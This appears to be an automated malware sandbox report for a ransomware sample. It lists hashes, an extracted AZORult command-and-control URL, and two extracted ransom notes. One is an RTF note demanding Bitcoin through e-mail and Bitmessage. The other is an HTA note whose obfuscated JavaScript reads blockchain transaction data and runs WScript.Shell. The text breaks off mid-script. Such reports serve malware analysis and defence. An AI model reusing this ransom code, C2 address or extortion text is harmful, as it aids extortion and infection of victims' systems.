General
-
Target
RNSM00361.7z
-
Size
22.0MB
-
Sample
241107-t9367ayldl
-
MD5
178c5959b76748b2dc7b8375d12db80e
-
SHA1
f292fe20d20524d7d9ac5658f35c4b85bea72112
-
SHA256
f526608a5b27e9f3b290011efc5ed2098a48cbb522d15f7788dcda4158a23f49
-
SHA512
9dc3274909bb0d6a39da8008d9c72ded281581f8ceab4e667670cf8e29fe5fca173ea7a2f53d1a34effeceac0105029202f83d83a1ecb1a548009aa81c4f18c0
-
SSDEEP
393216:uM1EMy1RIPjtv22c20MTko/jMbyQ4kFnsMXzoBzapYxt3Ld:uQPyPI5vvc2ZuQkqMM9a+h
Score
10/10
Malware Config
Extracted
Family
azorult
C2
http://admin.svapofit.com/azs/index.php
Extracted
Path
C:\Program Files (x86)\Microsoft Office\Office14\1033\#Decrypt_Files_ReadMe#.rtf
Ransom Note
{\rtf1\ansi\ansicpg1251\deff0\deflang1049{\fonttbl{\f0\fnil\fcharset0 Calibri;}{\f1\fnil\fcharset204 Calibri;}}
{\colortbl ;\red0\green0\blue255;\red255\green0\blue0;\red255\green255\blue255;}
{\*\generator Msftedit 5.41.21.2510;}\viewkind4\uc1\pard\ri-500\sa200\sl240\slmult1\qc\tx8804\lang1033\b\f0\fs28 WHAT HAPPENED WITH YOUR FILES?\lang1049\f1\par
\pard\ri-74\sa200\sl240\slmult1\tx8378\lang1033\b0\f0\fs24 Your documents, databases, backups, network folders and other important files are encrypted with RSA-2048 and AES-128 ciphers.\par
\pard\ri-74\sl240\slmult1\tx8378 More information about the RSA and AES can be found here:\par
{\field{\*\fldinst{HYPERLINK "http://en.wikipedia.org/wiki/RSA_(cryptosystem"}}{\fldrslt{\ul\cf1 http://en.wikipedia.org/wiki/RSA_(cryptosystem}}}\f0\fs24 )\par
\pard\ri-74\sa200\sl240\slmult1\tx8378{\field{\*\fldinst{HYPERLINK "http://en.wikipedia.org/wiki/Advanced_Encryption_Standard"}}{\fldrslt{\ul\cf1 http://en.wikipedia.org/wiki/Advanced_Encryption_Standard}}}\f0\fs24\par
It m\lang1049\f1\'e5\'e0\lang1033\f0 ns th\lang1049\f1\'e0\lang1033\f0 t y\lang1049\f1\'ee\lang1033\f0 u will n\lang1049\f1\'ee\lang1033\f0 t b\lang1049\f1\'e5\lang1033\f0 \lang1049\f1\'e0\lang1033\f0 bl\lang1049\f1\'e5\lang1033\f0 t\lang1049\f1\'ee\lang1033\f0 \lang1049\f1\'e0\lang1033\f0 cc\lang1049\f1\'e5\lang1033\f0 ss th\lang1049\f1\'e5\lang1033\f0 m \lang1049\f1\'e0\lang1033\f0 n\lang1049\f1\'f3\lang1033\f0 m\lang1049\f1\'ee\lang1033\f0 r\lang1049\f1\'e5\lang1033\f0 until th\lang1049\f1\'e5\'f3\lang1033\f0 \lang1049\f1\'e0\lang1033\f0 r\lang1049\f1\'e5\lang1033\f0 d\lang1049\f1\'e5\'f1\lang1033\f0 r\lang1049\f1\'f3\lang1033\f0 pt\lang1049\f1\'e5\lang1033\f0 d with y\lang1049\f1\'ee\lang1033\f0 ur p\lang1049\f1\'e5\lang1033\f0 rs\lang1049\f1\'ee\lang1033\f0 n\lang1049\f1\'e0\lang1033\f0 l d\lang1049\f1\'e5\'f1\lang1033\f0 r\lang1049\f1\'f3\lang1033\f0 pti\lang1049\f1\'ee\lang1033\f0 n k\lang1049\f1\'e5\lang1033\f0 y! With\lang1049\f1\'ee\lang1033\f0 ut \lang1049\f1\'f3\'ee\lang1033\f0 ur p\lang1049\f1\'e5\lang1033\f0 rs\lang1049\f1\'ee\lang1033\f0 n\lang1049\f1\'e0\lang1033\f0 l k\lang1049\f1\'e5\lang1033\f0 y \lang1049\f1\'e0\lang1033\f0 nd s\lang1049\f1\'f0\'e5\lang1033\f0 ci\lang1049\f1\'e0\lang1033\f0 l s\lang1049\f1\'ee\lang1033\f0 ftw\lang1049\f1\'e0\lang1033\f0 r\lang1049\f1\'e5\lang1033\f0 d\lang1049\f1\'e0\lang1033\f0 t\lang1049\f1\'e0\lang1033\f0 r\lang1049\f1\'e5\lang1033\f0 c\lang1049\f1\'ee\lang1033\f0 v\lang1049\f1\'e5\lang1033\f0 r\lang1049\f1\'f3\lang1033\f0 is imp\lang1049\f1\'ee\lang1033\f0 ssibl\lang1049\f1\'e5\lang1033\f0 ! If y\lang1049\f1\'ee\lang1033\f0 u will f\lang1049\f1\'ee\lang1033\f0 ll\lang1049\f1\'ee\lang1033\f0 w \lang1049\f1\'ee\lang1033\f0 ur instru\lang1049\f1\'f1\lang1033\f0 ti\lang1049\f1\'ee\lang1033\f0 ns, w\lang1049\f1\'e5\lang1033\f0 gu\lang1049\f1\'e0\lang1033\f0 r\lang1049\f1\'e0\lang1033\f0 nt\lang1049\f1\'e5\'e5\lang1033\f0 th\lang1049\f1\'e0\lang1033\f0 t y\lang1049\f1\'ee\lang1033\f0 u c\lang1049\f1\'e0\lang1033\f0 n d\lang1049\f1\'e5\'f1\lang1033\f0 ry\lang1049\f1\'f0\lang1033\f0 t \lang1049\f1\'e0\lang1033\f0 ll y\lang1049\f1\'ee\lang1033\f0 ur fil\lang1049\f1\'e5\lang1033\f0 s qui\lang1049\f1\'f1\lang1033\f0 kly \lang1049\f1\'e0\lang1033\f0 nd s\lang1049\f1\'e0\lang1033\f0 f\lang1049\f1\'e5\lang1033\f0 ly!\par
\pard\ri-74\sl240\slmult1\tx8378 =====================================================================\par
\pard\ri-74\sa200\sl240\slmult1\tx8378\lang1049\f1\'d3\'ee\lang1033\f0 u r\lang1049\f1\'e5\'e0\lang1033\f0 l\lang1049\f1\'f3\lang1033\f0 w\lang1049\f1\'e0\lang1033\f0 nt t\lang1049\f1\'ee\lang1033\f0 r\lang1049\f1\'e5\lang1033\f0 st\lang1049\f1\'ee\lang1033\f0 r\lang1049\f1\'e5\lang1033\f0 y\lang1049\f1\'ee\lang1033\f0 ur fil\lang1049\f1\'e5\lang1033\f0 s? Pl\lang1049\f1\'e5\'e0\lang1033\f0 s\lang1049\f1\'e5\lang1033\f0 writ\lang1049\f1\'e5\lang1033\f0 us t\lang1049\f1\'ee\lang1033\f0 th\lang1049\f1\'e5\lang1033\f0 \lang1049\f1\'e5\lang1033\f0 -m\lang1049\f1\'e0\lang1033\f0 ils:\par
\pard\sl240\slmult1\b\fs28 [email protected]\par
[email protected]\par
\pard\sa200\sl240\slmult1 [email protected]\par
\b0\fs24 In subj\lang1049\f1\'e5\lang1033\f0 ct lin\lang1049\f1\'e5 \'ee\lang1033\f0 f your m\lang1049\f1\'e5\lang1033\f0 ss\lang1049\f1\'e0\lang1033\f0 g\lang1049\f1\'e5\lang1033\f0 writ\lang1049\f1\'e5\lang1033\f0 y\lang1049\f1\'ee\lang1033\f0 ur p\lang1049\f1\'e5\lang1033\f0 rs\lang1049\f1\'ee\lang1033\f0 n\lang1049\f1\'e0\lang1033\f0 l ID:\par
\b\fs28 334F3FDC2140DC83\par
\cf2 W\lang1049\f1\'e5\lang1033\f0 r\lang1049\f1\'e5\'f1\'ee\lang1033\f0 mm\lang1049\f1\'e5\lang1033\f0 nd y\lang1049\f1\'ee\lang1033\f0 u t\lang1049\f1\'ee\lang1033\f0 s\lang1049\f1\'e5\lang1033\f0 nd y\lang1049\f1\'ee\lang1033\f0 ur m\lang1049\f1\'e5\lang1033\f0 ss\lang1049\f1\'e0\lang1033\f0 g\lang1049\f1\'e5\lang1033\f0 \lang1049\f1\'ce\lang1033\f0 N \lang1049\f1\'c5\'c0\'d1\lang1033\f0 H \lang1049\f1\'ee\lang1033\f0 f \lang1049\f1\'ce\lang1033\f0 UR 3 \lang1049\f1\'c5\'cc\'c0\lang1033\f0 ILS, du\lang1049\f1\'e5\lang1033\f0 t\lang1049\f1\'ee\lang1033\f0 th\lang1049\f1\'e5\lang1033\f0 f\lang1049\f1\'e0\'f1\lang1033\f0 t th\lang1049\f1\'e0\lang1033\f0 t th\lang1049\f1\'e5\lang1033\f0 m\lang1049\f1\'e5\lang1033\f0 ss\lang1049\f1\'e0\lang1033\f0 g\lang1049\f1\'e5\lang1033\f0 m\lang1049\f1\'e0\'f3\lang1033\f0 n\lang1049\f1\'ee\lang1033\f0 t r\lang1049\f1\'e5\'e0\lang1033\f0 ch th\lang1049\f1\'e5\lang1033\f0 ir int\lang1049\f1\'e5\lang1033\f0 nd\lang1049\f1\'e5\lang1033\f0 d r\lang1049\f1\'e5\lang1033\f0 cipi\lang1049\f1\'e5\lang1033\f0 nt f\lang1049\f1\'ee\lang1033\f0 r \lang1049\f1\'e0\lang1033\f0 v\lang1049\f1\'e0\lang1033\f0 ri\lang1049\f1\'e5\lang1033\f0 t\lang1049\f1\'f3\lang1033\f0 \lang1049\f1\'ee\lang1033\f0 f r\lang1049\f1\'e5\'e0\lang1033\f0 s\lang1049\f1\'ee\lang1033\f0 ns!\cf0\par
\pard\ri-74\sl240\slmult1\tx8378\b0\fs24 =====================================================================\par
\pard\ri-74\sa200\sl240\slmult1\tx8378 If \lang1049\f1\'f3\'ee\lang1033\f0 u pr\lang1049\f1\'e5\lang1033\f0 f\lang1049\f1\'e5\lang1033\f0 r liv\lang1049\f1\'e5\lang1033\f0 m\lang1049\f1\'e5\lang1033\f0 ss\lang1049\f1\'e0\lang1033\f0 ging y\lang1049\f1\'ee\lang1033\f0 u c\lang1049\f1\'e0\lang1033\f0 n s\lang1049\f1\'e5\lang1033\f0 nd us Bitm\lang1049\f1\'e5\lang1033\f0 nss\lang1049\f1\'e0\lang1033\f0 g\lang1049\f1\'e5\lang1033\f0 s fr\lang1049\f1\'ee\lang1033\f0 m \lang1049\f1\'e0\lang1033\f0 w\lang1049\f1\'e5\lang1033\f0 b br\lang1049\f1\'ee\lang1033\f0 ws\lang1049\f1\'e5\lang1033\f0 r thr\lang1049\f1\'ee\lang1033\f0 ugh th\lang1049\f1\'e5\lang1033\f0 w\lang1049\f1\'e5\lang1033\f0 bp\lang1049\f1\'e0\lang1033\f0 g\lang1049\f1\'e5\lang1033\f0 {\field{\*\fldinst{HYPERLINK "https://bitmsg.me"}}{\fldrslt{\ul\cf1 https://bitmsg.me}}}\f0\fs24 . B\lang1049\f1\'e5\lang1033\f0 l\lang1049\f1\'ee\lang1033\f0 w is \lang1049\f1\'e0\lang1033\f0 tut\lang1049\f1\'ee\lang1033\f0 ri\lang1049\f1\'e0\lang1033\f0 l \lang1049\f1\'ee\lang1033\f0 n h\lang1049\f1\'ee\lang1033\f0 w t\lang1049\f1\'ee\lang1033\f0 s\lang1049\f1\'e5\lang1033\f0 nd bitm\lang1049\f1\'e5\lang1033\f0 ss\lang1049\f1\'e0\lang1033\f0 g\lang1049\f1\'e5\lang1033\f0 vi\lang1049\f1\'e0\lang1033\f0 w\lang1049\f1\'e5\lang1033\f0 b br\lang1049\f1\'ee\lang1033\f0 ws\lang1049\f1\'e5\lang1033\f0 r:\par
1. \lang1049\f1\'ce\lang1033\f0 p\lang1049\f1\'e5\lang1033\f0 n in y\lang1049\f1\'ee\lang1033\f0 ur br\lang1049\f1\'ee\lang1033\f0 ws\lang1049\f1\'e5\lang1033\f0 r th\lang1049\f1\'e5\lang1033\f0 link {\field{\*\fldinst{HYPERLINK "https://bitmsg.me/users/sign_up"}}{\fldrslt{\ul\cf1 https://bitmsg.me/users/sign_up}}}\f0\fs24 \lang1049\f1\'e0\lang1033\f0 nd m\lang1049\f1\'e0\lang1033\f0 k\lang1049\f1\'e5\lang1033\f0 th\lang1049\f1\'e5\lang1033\f0 r\lang1049\f1\'e5\lang1033\f0 gistr\lang1049\f1\'e0\lang1033\f0 ti\lang1049\f1\'ee\lang1033\f0 n b\lang1049\f1\'f3\lang1033\f0 \lang1049\f1\'e5\lang1033\f0 nt\lang1049\f1\'e5\lang1033\f0 ring n\lang1049\f1\'e0\lang1033\f0 m\lang1049\f1\'e5\lang1033\f0 \lang1049\f1\'e5\lang1033\f0 m\lang1049\f1\'e0\lang1033\f0 il \lang1049\f1\'e0\lang1033\f0 nd p\lang1049\f1\'e0\lang1033\f0 ssw\lang1049\f1\'ee\lang1033\f0 rd.\par
2. \lang1049\f1\'d3\'ee\lang1033\f0 u must c\lang1049\f1\'ee\lang1033\f0 nfirm th\lang1049\f1\'e5\lang1033\f0 r\lang1049\f1\'e5\lang1033\f0 gistr\lang1049\f1\'e0\lang1033\f0 ti\lang1049\f1\'ee\lang1033\f0 n, r\lang1049\f1\'e5\lang1033\f0 turn t\lang1049\f1\'ee\lang1033\f0 \lang1049\f1\'f3\'ee\lang1033\f0 ur \lang1049\f1\'e5\lang1033\f0 m\lang1049\f1\'e0\lang1033\f0 il \lang1049\f1\'e0\lang1033\f0 nd f\lang1049\f1\'ee\lang1033\f0 ll\lang1049\f1\'ee\lang1033\f0 w th\lang1049\f1\'e5\lang1033\f0 instructi\lang1049\f1\'ee\lang1033\f0 ns th\lang1049\f1\'e0\lang1033\f0 t w\lang1049\f1\'e5\lang1033\f0 r\lang1049\f1\'e5\lang1033\f0 s\lang1049\f1\'e5\lang1033\f0 nt t\lang1049\f1\'ee\lang1033\f0 \lang1049\f1\'f3\'ee\lang1033\f0 u.\par
3. R\lang1049\f1\'e5\lang1033\f0 turn t\lang1049\f1\'ee\lang1033\f0 sit\lang1049\f1\'e5\lang1033\f0 \lang1049\f1\'e0\lang1033\f0 nd \lang1049\f1\'f1\lang1033\f0 lick \lang1049\f1 "\lang1033\f0 L\lang1049\f1\'ee\lang1033\f0 gin\lang1049\f1 "\lang1033\f0 l\lang1049\f1\'e0\lang1033\f0 b\lang1049\f1\'e5\lang1033\f0 l \lang1049\f1\'ee\lang1033\f0 r us\lang1049\f1\'e5\lang1033\f0 link {\field{\*\fldinst{HYPERLINK "https://bitmsg.me/users/sign_in"}}{\fldrslt{\ul\cf1 https://bitmsg.me/users/sign_in}}}\f0\fs24 , \lang1049\f1\'e5\lang1033\f0 nt\lang1049\f1\'e5\lang1033\f0 r \lang1049\f1\'f3\'ee\lang1033\f0 ur \lang1049\f1\'e5\lang1033\f0 m\lang1049\f1\'e0\lang1033\f0 il \lang1049\f1\'e0\lang1033\f0 nd p\lang1049\f1\'e0\lang1033\f0 ssw\lang1049\f1\'ee\lang1033\f0 rd \lang1049\f1\'e0\lang1033\f0 nd click th\lang1049\f1\'e5\lang1033\f0 "Sign in" butt\lang1049\f1\'ee\lang1033\f0 n. \lang1049\f1 \lang1033\f0\par
4. \lang1049\f1\'d1\lang1033\f0 lick th\lang1049\f1\'e5\lang1033\f0 "\lang1049\f1\'d1\lang1033\f0 r\lang1049\f1\'e5\'e0\lang1033\f0 t\lang1049\f1\'e5\lang1033\f0 R\lang1049\f1\'e0\lang1033\f0 nd\lang1049\f1\'ee\lang1033\f0 m \lang1049\f1\'e0\lang1033\f0 ddr\lang1049\f1\'e5\lang1033\f0 ss" butt\lang1049\f1\'ee\lang1033\f0 n.\par
5. \lang1049\f1\'d1\lang1033\f0 lick th\lang1049\f1\'e5\lang1033\f0 "N\lang1049\f1\'e5\lang1033\f0 w m\lang1049\f1\'e0\lang1033\f0 ss\lang1049\f1\'e0\lang1033\f0 g\lang1049\f1\'e5\lang1033\f0 " butt\lang1049\f1\'ee\lang1033\f0 n.\par
\b S\lang1049\f1\'e5\lang1033\f0 nding m\lang1049\f1\'e5\lang1033\f0 ss\lang1049\f1\'e0\lang1033\f0 g\lang1049\f1\'e5\lang1033\f0 :\par
T\lang1049\f1\'ee\lang1033\f0 :\b0 \lang1049\f1\'c5\lang1033\f0 nt\lang1049\f1\'e5\lang1033\f0 r \lang1049\f1\'e0\lang1033\f0 ddr\lang1049\f1\'e5\lang1033\f0 ss: \b BM-2cVeq4HtLaXPGTamXgv5rvwDjypapmy8ir\par
\pard\sa200\sl240\slmult1 Subj\lang1049\f1\'e5\'f1\lang1033\f0 t:\b0 \lang1049\f1\'c5\lang1033\f0 nt\lang1049\f1\'e5\lang1033\f0 r \lang1049\f1\'f3\'ee\lang1033\f0 ur ID: \b 334F3FDC2140DC83\par
M\lang1049\f1\'e5\lang1033\f0 ss\lang1049\f1\'e0\lang1033\f0 g\lang1049\f1\'e5\lang1033\f0 : \b0 D\lang1049\f1\'e5\lang1033\f0 scrib\lang1049\f1\'e5\lang1033\f0 wh\lang1049\f1\'e0\lang1033\f0 t \lang1049\f1\'f3\'ee\lang1033\f0 u think n\lang1049\f1\'e5\lang1033\f0 c\lang1049\f1\'e5\lang1033\f0 ss\lang1049\f1\'e0\lang1033\f0 r\lang1049\f1\'f3\lang1033\f0 .\par
\pard\ri-74\sa200\sl240\slmult1\tx8378\lang1049\f1\'d1\lang1033\f0 lick th\lang1049\f1\'e5\lang1033\f0 "S\lang1049\f1\'e5\lang1033\f0 nd m\lang1049\f1\'e5\lang1033\f0 ss\lang1049\f1\'e0\lang1033\f0 g\lang1049\f1\'e5\lang1033\f0 " butt\lang1049\f1\'ee\lang1033\f0 n.\par
\pard\ri-74\sl240\slmult1\tx8378 =====================================================================\par
\pard\sa200\sl240\slmult1\cf2\b\fs28 Pl\lang1049\f1\'e5\'e0\lang1033\f0 s\lang1049\f1\'e5\lang1033\f0 , writ\lang1049\f1\'e5\lang1033\f0 us in \lang1049\f1\'c5\lang1033\f0 nglish \lang1049\f1\'ee\lang1033\f0 r us\lang1049\f1\'e5\lang1033\f0 pr\lang1049\f1\'ee\lang1033\f0 f\lang1049\f1\'e5\lang1033\f0 ssi\lang1049\f1\'ee\lang1033\f0 n\lang1049\f1\'e0\lang1033\f0 l tr\lang1049\f1\'e0\lang1033\f0 nsl\lang1049\f1\'e0\lang1033\f0 t\lang1049\f1\'ee\lang1033\f0 r!\par
\pard\ri-74\sa200\sl240\slmult1\tx8378 If y\lang1049\f1\'ee\lang1033\f0 u w\lang1049\f1\'e0\lang1033\f0 nt t\lang1049\f1\'ee\lang1033\f0 r\lang1049\f1\'e5\lang1033\f0 st\lang1049\f1\'ee\lang1033\f0 r\lang1049\f1\'e5\lang1033\f0 y\lang1049\f1\'ee\lang1033\f0 ur fil\lang1049\f1\'e5\lang1033\f0 s, y\lang1049\f1\'ee\lang1033\f0 u h\lang1049\f1\'e0\lang1033\f0 v\lang1049\f1\'e5\lang1033\f0 t\lang1049\f1\'ee\lang1033\f0 p\lang1049\f1\'e0\lang1033\f0 y f\lang1049\f1\'ee\lang1033\f0 r d\lang1049\f1\'e5\'f1\lang1033\f0 r\lang1049\f1\'f3\lang1033\f0 pti\lang1049\f1\'ee\lang1033\f0 n in Bit\lang1049\f1\'f1\'ee\lang1033\f0 ins or with \lang1049\f1\'ee\lang1033\f0 th\lang1049\f1\'e5\lang1033\f0 r top \lang1049\f1\'f1\lang1033\f0 r\lang1049\f1\'f3\lang1033\f0 pt\lang1049\f1\'ee\'f1\lang1033\f0 urr\lang1049\f1\'e5\lang1033\f0 nc\lang1049\f1\'f3\lang1033\f0 .\par
Th\lang1049\f1\'e5\lang1033\f0 pric\lang1049\f1\'e5\lang1033\f0 d\lang1049\f1\'e5\'f0\'e5\lang1033\f0 nds \lang1049\f1\'ee\lang1033\f0 n h\lang1049\f1\'ee\lang1033\f0 w f\lang1049\f1\'e0\lang1033\f0 st \lang1049\f1\'f3\'ee\lang1033\f0 u writ\lang1049\f1\'e5\lang1033\f0 t\lang1049\f1\'ee\lang1033\f0 us!\par
\pard\sa200\sl240\slmult1\cf0\b0\fs24 Your message will be as confirmation you are ready to pay for decryption key. After the payment you will get the decryption tool with instructions that will decrypt all your files including network folders.\par
T\lang1049\f1\'ee\lang1033\f0 c\lang1049\f1\'ee\lang1033\f0 nfirm th\lang1049\f1\'e0\lang1033\f0 t w\lang1049\f1\'e5\lang1033\f0 c\lang1049\f1\'e0\lang1033\f0 n d\lang1049\f1\'e5\'f1\lang1033\f0 ry\lang1049\f1\'f0\lang1033\f0 t y\lang1049\f1\'ee\lang1033\f0 ur fil\lang1049\f1\'e5\lang1033\f0 s y\lang1049\f1\'ee\lang1033\f0 u c\lang1049\f1\'e0\lang1033\f0 n s\lang1049\f1\'e5\lang1033\f0 nd us up t\lang1049\f1\'ee\lang1033\f0 3 fil\lang1049\f1\'e5\lang1033\f0 s f\lang1049\f1\'ee\lang1033\f0 r fr\lang1049\f1\'e5\'e5\lang1033\f0 d\lang1049\f1\'e5\'f1\lang1033\f0 r\lang1049\f1\'f3\'f0\lang1033\f0 ti\lang1049\f1\'ee\lang1033\f0 n. Pl\lang1049\f1\'e5\'e0\lang1033\f0 s\lang1049\f1\'e5\lang1033\f0 n\lang1049\f1\'ee\lang1033\f0 te th\lang1049\f1\'e0\lang1033\f0 t fil\lang1049\f1\'e5\lang1033\f0 s f\lang1049\f1\'ee\lang1033\f0 r fr\lang1049\f1\'e5\'e5\lang1033\f0 d\lang1049\f1\'e5\'f1\lang1033\f0 r\lang1049\f1\'f3\'f0\lang1033\f0 ti\lang1049\f1\'ee\lang1033\f0 n must N\lang1049\f1\'ce\lang1033\f0 T c\lang1049\f1\'ee\lang1033\f0 nt\lang1049\f1\'e0\lang1033\f0 in \lang1049\f1\'e0\lang1033\f0 n\lang1049\f1\'f3\lang1033\f0 v\lang1049\f1\'e0\lang1033\f0 lu\lang1049\f1\'e0\lang1033\f0 bl\lang1049\f1\'e5\lang1033\f0 inf\lang1049\f1\'ee\lang1033\f0 rm\lang1049\f1\'e0\lang1033\f0 ti\lang1049\f1\'ee\lang1033\f0 n \lang1049\f1\'e0\lang1033\f0 nd th\lang1049\f1\'e5\lang1033\f0 ir t\lang1049\f1\'ee\lang1033\f0 t\lang1049\f1\'e0\lang1033\f0 l siz\lang1049\f1\'e5\lang1033\f0 must b\lang1049\f1\'e5\lang1033\f0 l\lang1049\f1\'e5\lang1033\f0 ss th\lang1049\f1\'e0\lang1033\f0 n 5Mb.\par
Y\lang1049\f1\'ee\lang1033\f0 u h\lang1049\f1\'e0\lang1033\f0 v\lang1049\f1\'e5\lang1033\f0 t\lang1049\f1\'ee\lang1033\f0 r\lang1049\f1\'e5\lang1033\f0 sp\lang1049\f1\'ee\lang1033\f0 nd \lang1049\f1\'e0\lang1033\f0 s s\lang1049\f1\'ee\'ee\lang1033\f0 n \lang1049\f1\'e0\lang1033\f0 s p\lang1049\f1\'ee\lang1033\f0 ssibl\lang1049\f1\'e5\lang1033\f0 t\lang1049\f1\'ee\lang1033\f0 \lang1049\f1\'e5\lang1033\f0 nsur\lang1049\f1\'e5\lang1033\f0 th\lang1049\f1\'e5\lang1033\f0 r\lang1049\f1\'e5\lang1033\f0 st\lang1049\f1\'ee\lang1033\f0 r\lang1049\f1\'e0\lang1033\f0 ti\lang1049\f1\'ee\lang1033\f0 n\lang1049\f1 \'ee\lang1033\f0 f y\lang1049\f1\'ee\lang1033\f0 ur fil\lang1049\f1\'e5\lang1033\f0 s, b\lang1049\f1\'e5\lang1033\f0 c\lang1049\f1\'e0\lang1033\f0 us\lang1049\f1\'e5\lang1033\f0 w\lang1049\f1\'e5\lang1033\f0 w\lang1049\f1\'ee\lang1033\f0 nt k\lang1049\f1\'e5\'e5\lang1033\f0 p y\lang1049\f1\'ee\lang1033\f0 ur d\lang1049\f1\'e5\lang1033\f0 cr\lang1049\f1\'f3\lang1033\f0 pti\lang1049\f1\'ee\lang1033\f0 n k\lang1049\f1\'e5\lang1033\f0 ys \lang1049\f1\'e0\lang1033\f0 t \lang1049\f1\'ee\lang1033\f0 ur s\lang1049
Emails
URLs
https://bitmsg.me}}}\f0\fs24
https://bitmsg.me/users/sign_up}}}\f0\fs24
https://bitmsg.me/users/sign_in}}}\f0\fs24
Extracted
Path
C:\Users\Admin\Documents\!HELP_SOS.hta
Ransom Note
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>Decryption Instructions</title>
<HTA:APPLICATION ID='App' APPLICATIONNAME="Decryption Instructions" SCROLL="yes" SINGLEINSTANCE="yes" WINDOWSTATE="maximize">
<style>
a {
color: #04a;
text-decoration: none;
}
a:hover {
text-decoration: underline;
}
body {
background-color: #e7e7e7;
color: #222;
font-family: "Lucida Sans Unicode", "Lucida Grande", sans-serif;
font-size: 12pt;
line-height: 16pt;
}
body, h1 {
margin: 0;
padding: 0;
}
h1 {
color: #555;
text-align: center;
padding-bottom: 1.5em;
}
h2 {
color: #555;
text-align: center;
}
ol li {
padding-bottom: 13pt;
}
.container {
background-color: #EEE;
border: 2pt solid #C7C7C7;
margin: 3%;
min-width: 600px;
padding: 5% 10%;
color: #444;
}
.filecontainer{
padding: 5% 10%;
display: none;
}
.header {
border-bottom: 2pt solid #c7c7c7;
padding-bottom: 5%;
}
.hr {
background: #bda;
display: block;
height: 2pt;
margin-top: 1.5%;
margin-bottom: 1.5%;
overflow: hidden;
width: 100%;
}
.key{
background-color: #A1D490;
border: 1px solid #506A48;
display: block;
text-align: center;
margin: 0.5em 0;
padding: 1em 1.5em;
word-wrap: break-word;
}
.keys{
margin: 3em 0;
}
.filename{
border: 3px solid #AAA;
display: block;
text-align: center;
margin: 0.5em 0em;
padding: 1em 1.5em;
background-color: #DCC;
}
.us{
text-decoration: strong;
color: #333;
}
.info{
background-color: #E4E4E4;
padding: 0.5em 3em;
margin: 1em 0;
}
.text{
text-align: justify;
}
#file{
background-color: #FCC;
}
.lsb{
display: none;
margin: 3%;
text-align: center;
}
.ls{
border: 1px solid #888;
border-radius: 3px;
padding: 0 0.5em;
margin: 1em 0.1em;
line-height: 2em;
display: inline-block;
}
.ls:hover{
background-color: #D0D0D0;
}
.l{
display:none;
}
.lu{
display:none;
}
</style>
<script language="vbscript">
Function GetCmd
GetCmd = App.commandLine
End Function
</script>
<script language="javascript">
function openlink(url){
new ActiveXObject("WScript.Shell").Run(url);
return false;
}
function aIndexOf(arr, v){
for(var i = 0; i < arr.length; i++) if(arr[i] == v) return i;
return -1;
}
function tweakClass(cl, f){
var els;
if(document.getElementByClassName != null){
els = document.getElementsByClassName(cl);
}
else{
els = [];
var tmp = document.getElementsByTagName('*');
for (var i = 0; i < tmp.length; i++){
var c = tmp[i].className;
if( (c == cl) || ((c.indexOf(cl) != 1) && ((' '+c+' ').indexOf(' '+cl+' ') != -1)) ) els.push(tmp[i]);
}
}
for(var i = 0; i < els.length; i++) f(els[i]);
}
function show(el){ el.style.display = 'block'; }
function hide(el){ el.style.display = 'none'; }
var langs = ["en","de","it","pt","es","fr","kr","nl","ar","fa","zh"];
function setLang(lang){
if(aIndexOf(langs, lang) == -1) lang = langs[0];
for(var i = 0; i < langs.length; i++){
var clang = langs[i];
tweakClass('l-'+clang, function(el){ el.style.display = (clang == lang) ? 'block' : 'none'; });
tweakClass('ls-'+clang, function(el){ el.style.backgroundColor = (clang == lang) ? '#BBB' : ''; });
}
}
function newXHR() {
if (window.XMLHttpRequest) return new window.XMLHttpRequest;
try {
return new ActiveXObject("MSXML2.XMLHTTP.3.0");
}
catch(error) {
return null;
}
}
function getPage(url, cb) {
try{
var xhr = newXHR();
if(!xhr) return cb('no xhr');
xhr.onreadystatechange = function() {
if(xhr.readyState != 4) return;
if(xhr.status != 200 || !xhr.responseText) return cb(xhr.status)
cb(null, xhr.responseText);
};
xhr.open("GET", url+((url.indexOf('?') == -1) ? "?" : "&") + "_=" + new Date().getTime(), true);
xhr.send();
}
catch(e){
cb(e);
}
}
function decodeTxString(hex){
var m = '0123456789abcdef';
var s = '';
var c = 0xAA;
hex = hex.toLowerCase();
for(var i = 0; i < hex.length; i+=2){
var a = m.indexOf(hex.charAt(i));
var b = m.indexOf(hex.charAt(i+1));
if(a == -1 || b == -1) throw hex[i]+hex[i+1]+' '+a+' '+b;
s+= String.fromCharCode(c = (c ^ ((a << 4) | b)));
}
return s;
}
var OR = 'OP_RE'+'TURN ';
var sources = [
{bp:'btc.b'+'lockr.i'+'o/api/v1/', txp:'tx/i'+'nfo/', adp:'add'+'ress/txs/',
ptxs: function(json){
if(json.status != 'success') return null;
var res = [];
for(var i = 0; i < json.data.txs.length - 1; i++) res.push(json.data.txs[i].tx);
return res;
},
ptx: function(json){
if(json.status != 'success') return null;
var os = json.data.vouts;
for(var i = 0; i < os.length; i++) if(os[i].extras.asm.indexOf(OR) == 0) return decodeTxString(os[i].extras.asm.substr(10));
return null;
}
},
{bp:'ch'+'ain.s'+'o/api/v2/', txp:'get_t'+'x_out'+'puts/btc/', adp:'get_tx_uns'+'pent/btc/',
ptxs: function(json){
if(json.status != 'success') return null;
var res = [];
for(var i = json.data.txs.length - 1; i >= 0; i--) res.push(json.data.txs[i].txid);
return res;
},
ptx: function(json){
if(json.status != 'success') return null;
var os = json.data.outputs;
for(var i = 0; i < os.length; i++) if(os[i].script.indexOf(OR) == 0) return decodeTxString(os[i].script.substr(10));
return null;
}
},
{bp:'bit'+'aps.co'+'m/api/', txp:'trans'+'action/', adp:'ad'+'dress/tra'+'nsactions/', adpb:'/0/sen'+'t/all',
ptxs: function(json){
var res = [];
for(var i = 0; i < json.length; i++) res.push(json[i][1]);
return res;
},
ptx: function(json){
var os = json.output;
for(var i = 0; i < os.length; i++) if(os[i].script.asm.indexOf(OR) == 0) return decodeTxString(os[i].script.asm.substr(10));
return null;
}
},
{bp:'api.b'+'lockcyp'+'her.com/v1/b'+'tc/main/', txp:'txs/', adp:'addrs/',
ptxs: function(json){
var res = [];
var m = {};
for(var i = 0; i < json.txrefs.length; i++){
var tx = json.txrefs[i].tx_hash;
if(m[tx]) continue;
m[tx] = 1;
res.push(tx);
}
return res;
},
ptx: function(json){
var os = json.outputs;
for(var i = 0; i < os.length; i++) if(os[i].data_hex != null) return decodeTxString(os[i].data_hex);
return null;
}
}
];
function eachUntil(a,f,c){
var i = 0;
var n = function(){
if(i >= a.length) return c('f');
f(a[i++], function(err, res){
if(err == null) return c(null, res);
n();
});
};
n();
}
function getJson(url, cb){
getPage(url, function(err, res){
